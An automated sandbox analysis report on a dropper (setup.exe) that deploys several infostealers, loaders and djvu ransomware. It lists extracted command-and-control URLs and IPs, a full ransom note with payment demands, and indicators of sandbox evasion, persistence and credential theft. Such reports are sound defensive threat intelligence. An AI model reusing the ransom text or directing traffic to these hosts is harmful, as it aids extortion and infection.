Overview
Score: 10
Target | Platform | Score
Static | static | 3
release_v4.rar | windows7-x64 | 3
release_v4.rar | windows10-2004-x64 | 7
ICQLiteShell.dll | windows7-x64 | 1
ICQLiteShell.dll | windows10-2004-x64 | 1
ICQRT.dll | windows7-x64 | 3
ICQRT.dll | windows10-2004-x64 | 3
Resource/S...di.spp | windows7-x64 | 3
Resource/S...di.spp | windows10-2004-x64 | 3
Resource/T...50.txt | windows7-x64 | 1
Resource/T...50.txt | windows10-2004-x64 | 1
Resource/T...51.txt | windows7-x64 | 1
Resource/T...51.txt | windows10-2004-x64 | 1
Resource/T...52.txt | windows7-x64 | 1
Resource/T...52.txt | windows10-2004-x64 | 1
Resource/T...53.txt | windows7-x64 | 1
Resource/T...53.txt | windows10-2004-x64 | 1
Resource/T...54.txt | windows7-x64 | 1
Resource/T...54.txt | windows10-2004-x64 | 1
Resource/T...57.txt | windows7-x64 | 1
Resource/T...57.txt | windows10-2004-x64 | 1
Resource/T...58.txt | windows7-x64 | 1
Resource/T...58.txt | windows10-2004-x64 | 1
Resource/r...es.pak | windows7-x64 | 3
Resource/r...es.pak | windows10-2004-x64 | 3
bentonite.png | windows7-x64 | 3
bentonite.png | windows10-2004-x64 | 3
setup.exe | windows7-x64 | 10
setup.exe | windows10-2004-x64 | 10

Analysis
max time kernel: 100s
max time network: 169s
platform: windows10-2004_x64
resource: win10v2004-20240221-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240221-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-02-2024 11:52

Static task static1
Behavioral task behavioral1: release_v4.rar (resource: win7-20240220-en)
Behavioral task behavioral2: release_v4.rar (resource: win10v2004-20240221-en)
Behavioral task behavioral3: ICQLiteShell.dll (resource: win7-20240221-en)
Behavioral task behavioral4: ICQLiteShell.dll (resource: win10v2004-20240221-en)
Behavioral task behavioral5: ICQRT.dll (resource: win7-20240221-en)
Behavioral task behavioral6: ICQRT.dll (resource: win10v2004-20240221-en)
Behavioral task behavioral7: Resource/SaslPrep/SaslPrepProfile_norm_bidi.spp (resource: win7-20240220-en)
Behavioral task behavioral8: Resource/SaslPrep/SaslPrepProfile_norm_bidi.spp (resource: win10v2004-20240221-en)
Behavioral task behavioral9: Resource/TypeSupport/Unicode/Mappings/win/CP1250.txt (resource: win7-20240221-en)
Behavioral task behavioral10: Resource/TypeSupport/Unicode/Mappings/win/CP1250.txt (resource: win10v2004-20240221-en)
Behavioral task behavioral11: Resource/TypeSupport/Unicode/Mappings/win/CP1251.txt (resource: win7-20240221-en)
Behavioral task behavioral12: Resource/TypeSupport/Unicode/Mappings/win/CP1251.txt (resource: win10v2004-20240221-en)
Behavioral task behavioral13: Resource/TypeSupport/Unicode/Mappings/win/CP1252.txt (resource: win7-20240221-en)
Behavioral task behavioral14: Resource/TypeSupport/Unicode/Mappings/win/CP1252.txt (resource: win10v2004-20240221-en)
Behavioral task behavioral15: Resource/TypeSupport/Unicode/Mappings/win/CP1253.txt (resource: win7-20240221-en)
Behavioral task behavioral16: Resource/TypeSupport/Unicode/Mappings/win/CP1253.txt (resource: win10v2004-20240221-en)
Behavioral task behavioral17: Resource/TypeSupport/Unicode/Mappings/win/CP1254.txt (resource: win7-20240220-en)
Behavioral task behavioral18: Resource/TypeSupport/Unicode/Mappings/win/CP1254.txt (resource: win10v2004-20240221-en)
Behavioral task behavioral19: Resource/TypeSupport/Unicode/Mappings/win/CP1257.txt (resource: win7-20240221-en)
Behavioral task behavioral20: Resource/TypeSupport/Unicode/Mappings/win/CP1257.txt (resource: win10v2004-20240221-en)
Behavioral task behavioral21: Resource/TypeSupport/Unicode/Mappings/win/CP1258.txt (resource: win7-20240220-en)
Behavioral task behavioral22: Resource/TypeSupport/Unicode/Mappings/win/CP1258.txt (resource: win10v2004-20240221-en)
Behavioral task behavioral23: Resource/resources.pak (resource: win7-20240221-en)
Behavioral task behavioral24: Resource/resources.pak (resource: win10v2004-20240221-en)
Behavioral task behavioral25: bentonite.png (resource: win7-20240215-en)
Behavioral task behavioral26: bentonite.png (resource: win10v2004-20240221-en)
Behavioral task behavioral27: setup.exe (resource: win7-20240221-en)

General
Target: setup.exe
Size: 738.0MB
MD5: d6cf8913bbfdbb9900164fb6e057dda7
SHA1: 97baef4de047edc648e4a4222db576079080cd66
SHA256: 5daa33a756141dac301dc364c1fc538e91cb66a4878719d3a645fd108c6dfa72
SHA512: ff42356169b867e88120b9a2b2dff39282d07beaf8302dd79681ddf414e93ae21ef5030a2af836e0b208b811582ae43507d197d13485135e83cb212708ca8daf
SSDEEP: 98304:C/J4w8+uMZh2F0pwIg7ogcSVn1TDifyDJdbgWETcWG/AbO0e+4:C/uXEhQ0pwIhgcSDGWnWte+4

Malware Config
Extracted: smokeloader
  pub3
Extracted: djvu
  http://habrafa.com/test2/get.php
  extension: .lkfr
  offline_id: OxV6DGl22io8sqMOW1zCCOlzPiv4f1Vqzw7Y8zt1
  payload_url:
  ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://we.tl/t-uNdL2KHHdy Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0852ASdw
Extracted: smokeloader
  2022
  http://sjyey.com/tmp/index.php
  http://babonwo.ru/tmp/index.php
  http://mth.com.ua/tmp/index.php
  http://piratia.pw/tmp/index.php
  http://go-piratia.ru/tmp/index.php
Extracted: risepro
  193.233.132.67:50500
  37.120.237.196:50500
  193.233.132.62
Extracted: stealc
  http://185.172.128.24
  url_path: /f993692117a3fda2.php
Extracted: lumma
  https://turkeyunlikelyofw.shop/api
  https://associationokeo.shop/api

Signatures

Detect ZGRat V1 4 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe | family_zgrat_v1
C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe | family_zgrat_v1
behavioral28/memory/6052-737-0x0000000000880000-0x0000000000ECA000-memory.dmp | family_zgrat_v1
C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe | family_zgrat_v1

Detected Djvu ransomware 5 IoCs
Processes:
resource | yara_rule
behavioral28/memory/748-741-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral28/memory/5984-755-0x00000000022F0000-0x000000000240B000-memory.dmp | family_djvu
behavioral28/memory/748-754-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral28/memory/748-736-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral28/memory/748-959-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.

Glupteba payload 1 IoCs
Processes:
resource | yara_rule
behavioral28/memory/5616-953-0x00000000051F0000-0x0000000005ADB000-memory.dmp | family_glupteba

SmokeLoader
Modular backdoor trojan in use since 2014.

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | setup.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | S7BJFj0JPGuOIK5ke2EiWzRe.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | NnROE5b4OASR13ERwrphVqIv.exe

Blocklisted process makes network request 8 IoCs
Processes:
flow | pid | process
214 | 2424 | schtasks.exe
215 | 2424 | schtasks.exe
217 | 2424 | schtasks.exe
218 | 2424 | schtasks.exe
219 | 2424 | schtasks.exe
221 | 2424 | schtasks.exe
227 | 2424 | schtasks.exe
228 | 2424 | schtasks.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid | process
5832 | netsh.exe
1708 | netsh.exe

Checks BIOS information in registry 2 TTPs 7 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | S7BJFj0JPGuOIK5ke2EiWzRe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | S7BJFj0JPGuOIK5ke2EiWzRe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | NnROE5b4OASR13ERwrphVqIv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | NnROE5b4OASR13ERwrphVqIv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | setup.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | setup.exe

Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | setup.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | f0_8GJMbJWHKd0bn8qAoSGuv.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | Install.exe

Drops startup file 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk | w6rxdZKVGKZ4S99sMhSfXG4z.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe | MsBuild.exe

Executes dropped EXE 28 IoCs
Processes:
pid | process
956 | zVlqImu7G3G4sPmxLZrutQJQ.exe
5276 | S7BJFj0JPGuOIK5ke2EiWzRe.exe
5288 | evl5AhAqx92wdfRi532WmaQN.exe
5260 | e1lkxrydipIJfmBIkHJEKZuB.exe
5616 | QaQDZ75Ud6n9EKcYI2SHfJNs.exe
5624 | VITLpmgdrZSEsfnjjCSHaEDR.exe
5640 | K0NNvWiVJgVgRj4wsXiZz39s.exe
5648 | vGrIU7ib1YOS2PYSmzDAoF5v.exe
5992 | LghhhG5dYtl5hoIKD95UlVUg.exe
5984 | f0_8GJMbJWHKd0bn8qAoSGuv.exe
6052 | AKDaZLMxwKvUY2U0BxfH0RwL.exe
6000 | LCpil3pW_l7ri4gXpRd7f0AQ.exe
6044 | evl5AhAqx92wdfRi532WmaQN.tmp
1732 | NnROE5b4OASR13ERwrphVqIv.exe
2932 | SBv9uOfXRyyWp_0lKyUFY2zJ.exe
1312 | w6rxdZKVGKZ4S99sMhSfXG4z.exe
1740 | jfuVd2Wxxnz6tzydAf9H8i_Y.exe
748 | f0_8GJMbJWHKd0bn8qAoSGuv.exe
2424 | schtasks.exe
916 | Install.exe
1564 | infotoolext.exe
4092 | infotoolext.exe
3080 | Install.exe
5020 | f0_8GJMbJWHKd0bn8qAoSGuv.exe
5204 | f0_8GJMbJWHKd0bn8qAoSGuv.exe
5968 | qemu-ga.exe
3036 | VITLpmgdrZSEsfnjjCSHaEDR.exe
6076 | QaQDZ75Ud6n9EKcYI2SHfJNs.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Software\Wine | S7BJFj0JPGuOIK5ke2EiWzRe.exe

Loads dropped DLL 6 IoCs
Processes:
pid | process
6044 | evl5AhAqx92wdfRi532WmaQN.tmp
6044 | evl5AhAqx92wdfRi532WmaQN.tmp
6044 | evl5AhAqx92wdfRi532WmaQN.tmp
956 | zVlqImu7G3G4sPmxLZrutQJQ.exe
956 | zVlqImu7G3G4sPmxLZrutQJQ.exe
6052 | AKDaZLMxwKvUY2U0BxfH0RwL.exe

Modifies file permissions 1 TTPs 1 IoCs

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | themida
C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | themida
behavioral28/memory/1732-839-0x0000000000920000-0x0000000000F32000-memory.dmp | themida
behavioral28/memory/1732-841-0x0000000000920000-0x0000000000F32000-memory.dmp | themida
behavioral28/memory/1732-843-0x0000000000920000-0x0000000000F32000-memory.dmp | themida
behavioral28/memory/1732-845-0x0000000000920000-0x0000000000F32000-memory.dmp | themida
behavioral28/memory/1732-846-0x0000000000920000-0x0000000000F32000-memory.dmp | themida
behavioral28/memory/1732-878-0x0000000000920000-0x0000000000F32000-memory.dmp | themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" | w6rxdZKVGKZ4S99sMhSfXG4z.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\60fd73a9-b566-4ebe-bf13-7efa1ba8c839\\f0_8GJMbJWHKd0bn8qAoSGuv.exe\" --AutoStart" | f0_8GJMbJWHKd0bn8qAoSGuv.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | setup.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | NnROE5b4OASR13ERwrphVqIv.exe

Drops Chrome extension 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | schtasks.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
216 | ipinfo.io
32 | api.myip.com
33 | api.myip.com
34 | ipinfo.io
180 | api.2ip.ua
35 | ipinfo.io
179 | api.2ip.ua
215 | api.myip.com
217 | ipinfo.io

Drops file in System32 directory 9 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\GroupPolicy | setup.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | setup.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | setup.exe
File opened for modification | C:\Windows\System32\GroupPolicy | schtasks.exe
File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | schtasks.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | setup.exe
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | schtasks.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | schtasks.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
pid | process
4996 | setup.exe
5276 | S7BJFj0JPGuOIK5ke2EiWzRe.exe
1732 | NnROE5b4OASR13ERwrphVqIv.exe

Suspicious use of SetThreadContext 4 IoCs
Processes:
description | pid | process | target process
PID 5984 set thread context of 748 | 5984 | f0_8GJMbJWHKd0bn8qAoSGuv.exe | f0_8GJMbJWHKd0bn8qAoSGuv.exe
PID 2932 set thread context of 5168 | 2932 | SBv9uOfXRyyWp_0lKyUFY2zJ.exe | RegAsm.exe
PID 5020 set thread context of 5204 | 5020 | f0_8GJMbJWHKd0bn8qAoSGuv.exe | f0_8GJMbJWHKd0bn8qAoSGuv.exe
PID 6052 set thread context of 2780 | 6052 | AKDaZLMxwKvUY2U0BxfH0RwL.exe | MsBuild.exe

Drops file in Program Files directory 2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | chrome.exe
File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log | chrome.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
5688 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 4 IoCs
Processes:
pid | pid_target | process | target process
4972 | 5260 | WerFault.exe |
1136 | 5204 | WerFault.exe | f0_8GJMbJWHKd0bn8qAoSGuv.exe
224 | 1740 | WerFault.exe | jfuVd2Wxxnz6tzydAf9H8i_Y.exe
5608 | 956 | WerFault.exe | zVlqImu7G3G4sPmxLZrutQJQ.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | K0NNvWiVJgVgRj4wsXiZz39s.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | K0NNvWiVJgVgRj4wsXiZz39s.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | K0NNvWiVJgVgRj4wsXiZz39s.exe

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | zVlqImu7G3G4sPmxLZrutQJQ.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | zVlqImu7G3G4sPmxLZrutQJQ.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
4836 | schtasks.exe
2808 | schtasks.exe
1460 | schtasks.exe
3780 | schtasks.exe
2456 | schtasks.exe
5164 | schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe

Modifies data under HKEY_USERS 64 IoCs

Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | f0_8GJMbJWHKd0bn8qAoSGuv.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid | process
5640 | K0NNvWiVJgVgRj4wsXiZz39s.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
pid | process
5940 | chrome.exe
5940 | chrome.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs
Suspicious use of FindShellTrayWindow 22 IoCs
Processes:
evl5AhAqx92wdfRi532WmaQN.tmpchrome.exepid process 6044 evl5AhAqx92wdfRi532WmaQN.tmp 3256 3256 3256 3256 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe -
Suspicious use of SendNotifyMessage 16 IoCs
Processes:
chrome.exepid process 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup.exeevl5AhAqx92wdfRi532WmaQN.exef0_8GJMbJWHKd0bn8qAoSGuv.exedescription pid process target process PID 4996 wrote to memory of 956 4996 setup.exe zVlqImu7G3G4sPmxLZrutQJQ.exe PID 4996 wrote to memory of 956 4996 setup.exe zVlqImu7G3G4sPmxLZrutQJQ.exe PID 4996 wrote to memory of 956 4996 setup.exe zVlqImu7G3G4sPmxLZrutQJQ.exe PID 4996 wrote to memory of 5260 4996 setup.exe e1lkxrydipIJfmBIkHJEKZuB.exe PID 4996 wrote to memory of 5260 4996 setup.exe e1lkxrydipIJfmBIkHJEKZuB.exe PID 4996 wrote to memory of 5260 4996 setup.exe e1lkxrydipIJfmBIkHJEKZuB.exe PID 4996 wrote to memory of 5276 4996 setup.exe S7BJFj0JPGuOIK5ke2EiWzRe.exe PID 4996 wrote to memory of 5276 4996 setup.exe S7BJFj0JPGuOIK5ke2EiWzRe.exe PID 4996 wrote to memory of 5276 4996 setup.exe S7BJFj0JPGuOIK5ke2EiWzRe.exe PID 4996 wrote to memory of 5288 4996 setup.exe evl5AhAqx92wdfRi532WmaQN.exe PID 4996 wrote to memory of 5288 4996 setup.exe evl5AhAqx92wdfRi532WmaQN.exe PID 4996 wrote to memory of 5288 4996 setup.exe evl5AhAqx92wdfRi532WmaQN.exe PID 4996 wrote to memory of 5616 4996 setup.exe QaQDZ75Ud6n9EKcYI2SHfJNs.exe PID 4996 wrote to memory of 5616 4996 setup.exe QaQDZ75Ud6n9EKcYI2SHfJNs.exe PID 4996 wrote to memory of 5616 4996 setup.exe QaQDZ75Ud6n9EKcYI2SHfJNs.exe PID 4996 wrote to memory of 5624 4996 setup.exe VITLpmgdrZSEsfnjjCSHaEDR.exe PID 4996 wrote to memory of 5624 4996 setup.exe VITLpmgdrZSEsfnjjCSHaEDR.exe PID 4996 wrote to memory of 5624 4996 setup.exe VITLpmgdrZSEsfnjjCSHaEDR.exe PID 4996 wrote to memory of 5640 4996 setup.exe K0NNvWiVJgVgRj4wsXiZz39s.exe PID 4996 wrote to memory of 5640 4996 setup.exe K0NNvWiVJgVgRj4wsXiZz39s.exe PID 4996 wrote to memory of 5640 4996 setup.exe K0NNvWiVJgVgRj4wsXiZz39s.exe PID 4996 wrote to memory of 5648 4996 setup.exe vGrIU7ib1YOS2PYSmzDAoF5v.exe PID 4996 wrote to memory of 5648 4996 setup.exe vGrIU7ib1YOS2PYSmzDAoF5v.exe PID 4996 wrote to memory of 5648 4996 setup.exe vGrIU7ib1YOS2PYSmzDAoF5v.exe PID 4996 wrote to memory of 5992 4996 setup.exe 
LghhhG5dYtl5hoIKD95UlVUg.exe PID 4996 wrote to memory of 5992 4996 setup.exe LghhhG5dYtl5hoIKD95UlVUg.exe PID 4996 wrote to memory of 5992 4996 setup.exe LghhhG5dYtl5hoIKD95UlVUg.exe PID 4996 wrote to memory of 5984 4996 setup.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 5984 4996 setup.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 5984 4996 setup.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 6000 4996 setup.exe LCpil3pW_l7ri4gXpRd7f0AQ.exe PID 4996 wrote to memory of 6000 4996 setup.exe LCpil3pW_l7ri4gXpRd7f0AQ.exe PID 4996 wrote to memory of 6000 4996 setup.exe LCpil3pW_l7ri4gXpRd7f0AQ.exe PID 4996 wrote to memory of 6052 4996 setup.exe AKDaZLMxwKvUY2U0BxfH0RwL.exe PID 4996 wrote to memory of 6052 4996 setup.exe AKDaZLMxwKvUY2U0BxfH0RwL.exe PID 4996 wrote to memory of 6052 4996 setup.exe AKDaZLMxwKvUY2U0BxfH0RwL.exe PID 5288 wrote to memory of 6044 5288 evl5AhAqx92wdfRi532WmaQN.exe evl5AhAqx92wdfRi532WmaQN.tmp PID 5288 wrote to memory of 6044 5288 evl5AhAqx92wdfRi532WmaQN.exe evl5AhAqx92wdfRi532WmaQN.tmp PID 5288 wrote to memory of 6044 5288 evl5AhAqx92wdfRi532WmaQN.exe evl5AhAqx92wdfRi532WmaQN.tmp PID 4996 wrote to memory of 1312 4996 setup.exe w6rxdZKVGKZ4S99sMhSfXG4z.exe PID 4996 wrote to memory of 1312 4996 setup.exe w6rxdZKVGKZ4S99sMhSfXG4z.exe PID 4996 wrote to memory of 1312 4996 setup.exe w6rxdZKVGKZ4S99sMhSfXG4z.exe PID 4996 wrote to memory of 1732 4996 setup.exe NnROE5b4OASR13ERwrphVqIv.exe PID 4996 wrote to memory of 1732 4996 setup.exe NnROE5b4OASR13ERwrphVqIv.exe PID 4996 wrote to memory of 1732 4996 setup.exe NnROE5b4OASR13ERwrphVqIv.exe PID 4996 wrote to memory of 2932 4996 setup.exe SBv9uOfXRyyWp_0lKyUFY2zJ.exe PID 4996 wrote to memory of 2932 4996 setup.exe SBv9uOfXRyyWp_0lKyUFY2zJ.exe PID 4996 wrote to memory of 2932 4996 setup.exe SBv9uOfXRyyWp_0lKyUFY2zJ.exe PID 4996 wrote to memory of 1740 4996 setup.exe jfuVd2Wxxnz6tzydAf9H8i_Y.exe PID 4996 wrote to memory of 1740 4996 setup.exe 
jfuVd2Wxxnz6tzydAf9H8i_Y.exe PID 4996 wrote to memory of 1740 4996 setup.exe jfuVd2Wxxnz6tzydAf9H8i_Y.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 2424 4996 setup.exe schtasks.exe PID 4996 wrote to memory of 2424 4996 setup.exe schtasks.exe PID 4996 wrote to memory of 2424 4996 setup.exe schtasks.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe
Processes (tree depth in brackets; "cmd" is the recorded command line)

[1] C:\Users\Admin\AppData\Local\Temp\setup.exe  (PID 4996)
    cmd: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe  (PID 956)
      cmd: "C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\SysWOW64\WerFault.exe  (PID 5608)
        cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 2164
        - Program crash
  [2] C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe  (PID 6000)
      cmd: "C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe"
      - Executes dropped EXE
